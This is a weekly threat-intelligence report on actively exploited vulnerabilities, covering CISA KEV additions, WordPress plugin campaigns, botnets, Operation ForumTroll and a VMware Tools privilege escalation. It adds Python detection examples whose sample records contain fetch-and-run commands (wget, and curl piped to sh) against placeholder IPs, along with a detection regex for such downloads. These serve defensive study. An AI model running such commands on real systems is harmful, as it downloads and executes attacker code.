Executive Summary
The cybersecurity landscape this week was marked by a sharp escalation in hands-on exploitation, with threat actors actively targeting enterprise platforms, WordPress ecosystems, and vulnerable IoT infrastructure.
CISA expanded its Known Exploited Vulnerabilities catalog by adding six high-priority flaws: two in Dassault Systèmes DELMIA Apriso and one each affecting Microsoft Windows, the XWiki Platform, Adobe Commerce and Magento, and Broadcom VMware. Meanwhile, four WordPress plugin vulnerabilities came under active attack, with Wordfence releasing detailed analysis to aid defenders.
Botnet operators continued to scale operations globally, with EnemyBot, Sysrv-k, Andoryu, and Androxgh0st aggressively abusing exposed GitLab services, cloud gateways, and PHP-based applications. IoT botnets including Mirai, Bashlite, Tsunami, and BrickerBot intensified their focus on Eir D1000 routers to establish persistent footholds and enable lateral movement across networks.
In parallel, targeted espionage activity resurfaced as Kaspersky uncovered Operation ForumTroll, a spear-phishing campaign weaponizing a Chrome sandbox-escape vulnerability to compromise selected victims. Simultaneously, Nviso Labs linked exploitation of a VMware tools vulnerability to suspected China-nexus actor UNC5174.
Key points
- 6 new vulnerabilities were added to the CISA Known Exploited Vulnerabilities (KEV) catalog, reflecting recent exploitation activity.
- 4 additional vulnerabilities were confirmed as actively exploited in the wild during the week.
- Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.
- 2 vulnerabilities were identified as being exploited by active malware campaigns, indicating weaponization by threat actors.
- Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.
What are the top trending or critical vulnerabilities observed this week?
Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.
CVE-2025-6204 - Code Injection Vulnerability in Dassault Systèmes DELMIA Apriso
A Code Injection vulnerability in Dassault Systèmes DELMIA Apriso enables remote arbitrary code execution. According to Project Discovery, the issue is exploitable as part of a chained attack: CVE-2025-6205 permits unauthenticated creation of accounts with the privileged “Production User” role, and those credentials can then be used to abuse CVE-2025-6204, a file-upload path traversal that allows writing executable files (for example, a web shell) into the web root, together enabling full system compromise. The flaw affects Release 2020 through Release 2025. Dassault released a patch in early August 2025, but a public proof-of-concept is available, and the vulnerability has now been added to the CISA KEV catalog.
CVE-2025-6205 - Missing Authorization Vulnerability in Dassault Systèmes DELMIA Apriso
A Missing Authorization vulnerability in Dassault Systèmes DELMIA Apriso can lead to privilege escalation and remote code execution. Project Discovery showed a two-step chain: CVE-2025-6205, an unauthenticated SOAP account-creation flaw that can create privileged “Production User” accounts, followed by CVE-2025-6204, a path-traversal file upload that allows writing executable files (a web shell) into the web root, enabling RCE. The issue affects Release 2020 through Release 2025; Dassault released a patch in early August 2025. A public proof-of-concept is available, and the vulnerability has been added to the CISA KEV catalog.
CVE-2025-11533 – Privilege Escalation Vulnerability in WP Freeio WordPress plugin
A Privilege Escalation vulnerability in the WP Freeio WordPress plugin allows unauthenticated attackers to create administrator accounts by manipulating the user-role field during registration, due to an insecure process_register() function in the WP_Freeio_User class. The flaw affects versions prior to 1.2.22 and was patched in version 1.2.22. Wordfence reports that exploitation began immediately after public disclosure on October 10, 2025, with over 33,200 attacks blocked as threat actors used cloud-based infrastructure to automate attempts. Once admin access is obtained, attackers can upload malicious plugins or themes and alter site content for redirection or spam injection. A public proof-of-concept is available, and the vulnerability is actively being exploited in the wild.
CVE-2025-24893 - Eval Injection Vulnerability in XWiki Platform
An Eval Injection vulnerability in the XWiki Platform allows unauthenticated attackers to inject templates and execute arbitrary Groovy code via the SolrSearch macro. OffSec identified that the Main.SolrSearchMacros macro unsafely evaluates Groovy expressions supplied through the search parameter on publicly exposed instances, enabling full RCE wherever the macro is present. Their analysis outlines a two-stage attack chain in which a URL-encoded Groovy payload downloads a downloader (x640) into /tmp/11909 from 193.32.208(.)24:8080, which then fetches additional payloads (x521/x522) that deploy a UPX-packed Monero miner (tcrond), kill competing miners, persist under /var/tmp, and mine via auto.c3pool.org:80. The activity was linked to 123.25.249(.)88 and flagged in AbuseIPDB. Public proofs-of-concept are available, and VulnCheck has confirmed active exploitation. The vulnerability is patched in XWiki versions 15.10.11, 16.4.1, and 16.5.0-RC1, and it has also been added to the CISA KEV catalog.
CVE-2025-41244 - Privilege Defined with Unsafe Actions Vulnerability in the Broadcom VMware Aria Operations and VMware Tools
A Privilege Defined with Unsafe Actions vulnerability in Broadcom VMware Aria Operations and VMware Tools allows a low-privileged user on a VM to escalate to root by exploiting an untrusted search path in the get-versions.sh script used for service discovery. The flaw stems from overly broad binary-matching logic that executes a discovered binary with elevated rights, so an attacker can place a malicious executable in a writable directory and have it run as root. Active exploitation has been observed since mid-October 2024, prompting Broadcom to release patched versions. Organizations are advised to update immediately and to monitor for unusual child processes spawned by vmtoolsd or get-versions.sh and for script artifacts in /tmp/VMware-SDMP-Scripts-UUID directories. This vulnerability has also been added to the CISA KEV catalog due to confirmed exploitation in the wild.
CVE-2025-54236 - Improper Input Validation Vulnerability in Adobe Commerce and Magento Open Source
An Improper Input Validation vulnerability in Adobe Commerce and Magento Open Source allows session takeover and remote code execution through a nested deserialization flaw in the Commerce REST API. Despite Adobe releasing a hotfix in September 2025, Sansec has recently detected active exploitation, recording more than 250 attack attempts within 24 hours, where threat actors uploaded PHP webshells via the /customer/address_file/upload endpoint and executed phpinfo probes to gather server configuration data. Current telemetry indicates that approximately 62% of Magento stores remain unpatched, leaving a substantial portion of the ecosystem exposed to compromise. The vulnerability has since been added to the CISA KEV catalog, underscoring the urgent need to apply Adobe’s latest security update or implement the recommended mitigations immediately.
CVE-2025-59287 - Deserialization of Untrusted Data Vulnerability in Microsoft Windows
A Deserialization of Untrusted Data vulnerability in Microsoft Windows Server Update Services (WSUS) allows unauthenticated remote code execution via unsafe deserialization of encrypted AuthorizationCookie objects delivered to the GetCookie() SOAP endpoint. HawkTrace analysis shows AES-128-CBC-decrypted payloads are passed to BinaryFormatter.Deserialize() without type validation, enabling crafted serialized objects to execute code in the WSUS process (running as SYSTEM); Eye Security observed active exploitation beginning 06:55 UTC on 24 October 2025, and the Netherlands NCSC corroborated those incidents. Although Microsoft released a patch in the October 2025 update, a public proof-of-concept exploit is available, and real-world exploitation has been observed. The issue has now been added to the CISA KEV catalog, and affected organizations should apply the vendor update or implement recommended mitigations immediately.
Resurgent WordPress Exploit Campaign Targets GutenKit & Hunk Companion Vulnerabilities
Wordfence observed a renewed wave of mass exploitation targeting three critical WordPress plugin vulnerabilities: CVE-2024-9234 in GutenKit, and CVE-2024-9707 and CVE-2024-11972 in Hunk Companion.
These flaws allow unauthenticated attackers to install arbitrary plugins or upload malicious files, leading to full site compromise. CVE-2024-9234 affects GutenKit up to and including version 2.1.0 and was patched in version 2.1.1. CVE-2024-9707 involves a missing capability check in Hunk Companion’s import endpoint, and CVE-2024-11972 stems from a broken permission callback that always grants access; both issues were fixed in later Hunk Companion updates.
Since the attack resurgence, Wordfence has blocked over 8.7 million exploit attempts as a botnet of compromised servers and cloud systems deploys malicious plugin ZIPs containing backdoors, file managers, and web shells. Fake plugin names observed in this campaign include background-image-cropper, ultra-seo-processor-wp, oke, and up, used to gain persistence, exfiltrate data, and launch follow-on payloads. Users are urged to immediately update the affected plugins and inspect sites for unauthorized plugin installations.
What did Cytellite sensors detect this week?
Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.
What botnet activity was observed this week?
Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets, with payloads indicative of botnet activity, such as using wget commands with specific IP addresses, highlighting ongoing automated exploitation campaigns.
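As an added example (not from the report or its MISP data), the following Python sketch applies the wget-with-IP heuristic mentioned above to constructed sensor records: it URL-decodes each request twice and reports every wget, curl or tftp invocation that fetches from a bare IP address. The record format, the regex and the TEST-NET addresses are all assumptions made for the illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sensor records in a "METHOD PATH body=RAW" shape (not real telemetry);
# the addresses are TEST-NET values, not indicators from the report.
SAMPLE_REQUESTS = [
    "POST /cgi-bin/status.cgi body=cmd%3Dwget%20http%3A%2F%2F203.0.113.7%2Fbins%2Farm7%20-O%20%2Ftmp%2Fx",
    "GET /index.php?page=about body=",
    "POST /api/v4/projects body=url=http://198.51.100.9:8080/x.sh;curl+-s+http://198.51.100.9:8080/x.sh|sh",
    "GET /wp-login.php body=",
]
# Downloader invocations that pull from a bare IP, optionally with a port (assumed shapes).
FETCH_RE = re.compile(r"\b(wget|curl|tftp)\b[^;|&]*?(\d{1,3}(?:\.\d{1,3}){3})(?::(\d+))?")
LINE_RE = re.compile(r"^(\S+) (\S+) body=(.*)$")

def parse_record(line: str) -> dict:
    """Split a record and URL-decode it twice, since payloads are often double-encoded."""
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unparseable record: {line!r}")
    method, path, body = m.groups()
    decoded = unquote_plus(unquote_plus(path + " " + body))
    return {"method": method, "path": path, "decoded": decoded}

def botnet_indicators(lines: list) -> list:
    """One finding per downloader-from-IP pattern seen in a decoded request."""
    findings = []
    for line in lines:
        rec = parse_record(line)
        for tool, ip, port in FETCH_RE.findall(rec["decoded"]):
            findings.append({"method": rec["method"], "path": rec["path"],
                             "tool": tool, "source": ip + (f":{port}" if port else "")})
    return findings
```

Feeding real sensor output through `botnet_indicators` yields the download hosts to pivot on, while requests without a fetch-from-IP pattern (the two GETs in the sample) produce nothing.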
Which vulnerabilities were abused by malware this week?
Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analyzed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.
Operation ForumTroll leverages a Google Chrome vulnerability
Kaspersky researchers have recently identified that a spear-phishing campaign dubbed Operation ForumTroll leveraged a Chrome sandbox escape vulnerability, CVE-2025-2783, as a zero-day, delivered via a forum-themed lure to achieve remote code execution, with the initial compromise chain bootstrapped by a lightweight loader known as LeetAgent that establishes C2 and stages follow-on payloads. Researchers further link the campaign to deployment of Dante spyware (a commercial, heavily obfuscated Memento Labs toolset featuring VMProtect, AES-encrypted modular components, machine-bound keys, and advanced anti-analysis measures), and shared code paths, persistence mechanisms, and artifacts strongly indicate reuse or supply of Dante components in these operations against media, academic, research, government, and financial targets.
Chinese hackers exploit VMware Tools flaw
Nviso Labs reports that the active exploitation of CVE-2025-41244 appears tied to UNC5174, a suspected China-nexus threat group known for opportunistic use of publicly available exploits for initial access. However, analysts caution that, because the exploit technique is straightforward and mirrors common malware behavior such as naming malicious binaries after legitimate system files like httpd, it is still uncertain whether UNC5174 intentionally abused the vulnerability or whether other threat actors have been unknowingly triggering this local privilege-escalation flaw over time.
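The monitoring advice in the CVE-2025-41244 entry above (unusual children of vmtoolsd or get-versions.sh) and the httpd-masquerading detail from Nviso can be turned into a simple triage check. The following is an added example, not code from the report, Broadcom or Nviso: it parses a constructed `ps` snapshot, walks each process's ancestry looking for vmtoolsd or a get-versions.sh interpreter, and flags binaries that the discovery chain launched from outside an assumed set of trusted directories.

```python
import re

# Constructed `ps -eo pid,ppid,comm,args --no-headers` snapshot from a Linux guest;
# PIDs, paths and the VMware-SDMP-Scripts directory name are made up for illustration.
SAMPLE_PS = """\
  812     1 vmtoolsd /usr/bin/vmtoolsd
 4410   812 bash     /bin/bash /tmp/VMware-SDMP-Scripts-7f3a1c/get-versions.sh
 4418  4410 httpd    /tmp/httpd -v
  950     1 httpd    /usr/sbin/httpd -k start
 4501   812 sh       /bin/sh /tmp/VMware-SDMP-Scripts-7f3a1c/get-versions.sh
 4509  4501 nginx    /usr/sbin/nginx -v
"""
# Where a service binary is expected to live (assumption; tune per distribution).
TRUSTED_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/bin/", "/sbin/", "/opt/")
# Daemon names worth calling out when found elsewhere; httpd is the name Nviso saw
# being borrowed, the rest are illustrative additions.
DAEMON_NAMES = {"httpd", "nginx", "mysqld", "sshd", "postgres"}
LINE_RE = re.compile(r"^\s*(\d+)\s+(\d+)\s+(\S+)\s+(.*)$")
Procs = dict[int, tuple[int, str, str]]  # pid -> (ppid, comm, args)

def parse_ps(text: str) -> Procs:
    """Parse ps output into a pid-keyed table."""
    procs: Procs = {}
    for m in filter(None, map(LINE_RE.match, text.splitlines())):
        procs[int(m.group(1))] = (int(m.group(2)), m.group(3), m.group(4))
    return procs

def discovery_ancestor(pid: int, procs: Procs) -> bool:
    """True if vmtoolsd or a get-versions.sh interpreter sits anywhere above pid."""
    ppid = procs[pid][0]
    while ppid in procs:
        _, comm, args = procs[ppid]
        if comm == "vmtoolsd" or "get-versions.sh" in args:
            return True
        ppid = procs[ppid][0]
    return False

def find_suspicious(text: str) -> list[str]:
    """Report binaries the discovery chain launched from a non-standard path."""
    procs = parse_ps(text)
    findings = []
    for pid, (ppid, comm, args) in procs.items():
        exe = args.split()[0] if args else ""
        if not exe.startswith("/") or exe.startswith(TRUSTED_PREFIXES):
            continue  # relative name or trusted location
        if not discovery_ancestor(pid, procs):
            continue  # not spawned through vmtoolsd / get-versions.sh
        note = " (masquerades as a system daemon)" if comm in DAEMON_NAMES else ""
        findings.append(f"pid {pid} {exe} spawned by pid {ppid} {procs[ppid][2]}{note}")
    return findings
```

On the sample, only the /tmp/httpd child of the get-versions.sh interpreter is reported; the genuine /usr/sbin/httpd and the nginx probe from a trusted path are left alone.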
Were any PRE-NVD vulnerabilities identified this week?
PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.
Conclusion
Overall, this week underscored a clear trend of adversaries accelerating real-world exploitation across multiple attack surfaces, combining opportunistic mass-scanning with targeted intrusions and sophisticated privilege-escalation techniques. Platforms like Loginsoft Vulnerability Intelligence (LOVI) help organizations stay ahead by delivering timely exploit insights, mapping attacker activity, and enabling rapid response to emerging threats in a constantly evolving threat landscape.
FAQs:
1) What is Microsoft Windows Server Update Services (WSUS)?
A) Windows Server Update Services (WSUS) is a Windows Server role used by organizations to centrally approve, manage, and distribute Microsoft updates to endpoints, allowing clients to pull update metadata and approved patches from an internal repository over HTTP (port 8530) or HTTPS (port 8531) instead of contacting Microsoft Update directly.
2) What is CVE-2025-2783?
A) CVE-2025-2783 is a sandbox escape vulnerability in Google Chromium's Mojo component on Windows that arises from a logic error in which an incorrect handle is assigned under certain unspecified conditions. The flaw, described as an instance of an "incorrect handle provided in unspecified circumstances," could allow attackers to escape Chrome’s security sandbox, potentially leading to remote code execution.
3) What does “PoC available” mean, and why does it increase risk for a vulnerability?
A) “PoC available” means a working exploit for the vulnerability has been publicly released, proving it can be abused. This helps defenders test and validate fixes, but it also gives attackers a ready-made blueprint, often leading to rapid and widespread exploitation if systems remain unpatched.
4) What does inclusion in the CISA KEV catalog indicate about a vulnerability’s risk level?
A) When a vulnerability is added to the CISA KEV catalog, it signifies that it is being actively exploited in real-world attacks and poses a serious, immediate risk. CISA includes only confirmed exploited vulnerabilities in this list to ensure organizations focus on patching the most dangerous threats first. Being listed means the flaw demands urgent remediation to prevent compromise across government and enterprise environments.